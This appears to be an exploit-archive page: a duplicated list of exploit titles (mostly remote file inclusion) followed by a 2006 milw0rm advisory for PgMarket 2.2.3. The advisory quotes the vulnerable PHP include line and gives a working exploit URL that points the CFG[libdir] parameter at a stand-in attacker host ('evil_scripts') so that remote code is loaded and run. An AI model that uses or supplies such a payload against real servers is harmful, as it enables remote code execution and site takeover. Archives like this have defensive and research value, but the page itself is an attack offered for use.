
2 new exploits SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion phNNTP 1.3 - (article-raw.php) Remote File Inclusion Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion PHPMyRing 4.2.0 - (view_com.php) SQL Injection SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit phpwcms 1.1-RC4 - (spaw) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion phpPrintAnalyzer 1.2 - Remote File Inclusion Wheatblog 1.1 - (session.php) Remote File Inclusion phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload FortiClient SSLVPN 5.4 - Credentials Disclosure
40 lines
945 B
Text
Executable file
40 lines
945 B
Text
Executable file
####################################################
|
|
#
|
|
#
|
|
# C Y B E R - W A R R i O R T I M
|
|
#
|
|
#
|
|
####################################################
|
|
|
|
PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities
|
|
|
|
####################################################
|
|
|
|
Author: xoron
|
|
|
|
####################################################
|
|
|
|
Class : Remote
|
|
|
|
####################################################
|
|
|
|
cont@ct: x0r0n[at]hotmail[dot]com
|
|
|
|
####################################################
|
|
|
|
Code:
|
|
|
|
include ($CFG["libdir"] . "stdlib.inc.php");
|
|
|
|
####################################################
|
|
|
|
Exploit:
|
|
http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?
|
|
|
|
####################################################
|
|
|
|
Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends
|
|
|
|
####################################################
|
|
|
|
# milw0rm.com [2006-08-09]
|